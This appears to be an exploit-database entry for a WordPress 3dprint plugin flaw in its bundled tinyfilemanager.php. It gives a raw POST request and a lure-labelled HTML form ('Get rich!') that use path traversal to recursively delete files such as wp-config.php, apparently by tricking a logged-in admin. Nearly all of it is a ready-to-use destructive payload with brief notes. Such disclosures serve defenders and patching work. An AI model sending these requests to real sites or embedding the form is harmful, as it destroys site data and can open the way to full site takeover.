## https://sploitus.com/exploit?id=WPEX-ID:E3131E16-A0EB-4D26-B6D3-048FC1F1E9FA
== RAW POST Request==
POST /wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php HTTP/1.1
Host: example.com
Cookie: [admin+]
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
group=1&delete=1&file%5b0%5d=../2022&file%5b1%5d=../../../wp-config.php
== HTML form ==
<form action="https://example.com//wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
<input type="hidden" name="group" value="1">
<input type="hidden" name="delete" value="1">
<input type="hidden" name="file[1]" value="../2020">
<input type="hidden" name="file[2]" value="../../../wp-config.php">
<input type="submit" value="Get rich!">
</form>
== Notes ==
The value of 'group' and 'delete' can be anything, they are never used.
The file path of the files and dirs to delete is relative to the plugin upload root, 'wp-content/uploads/p3d'. Directories are deleted recursively.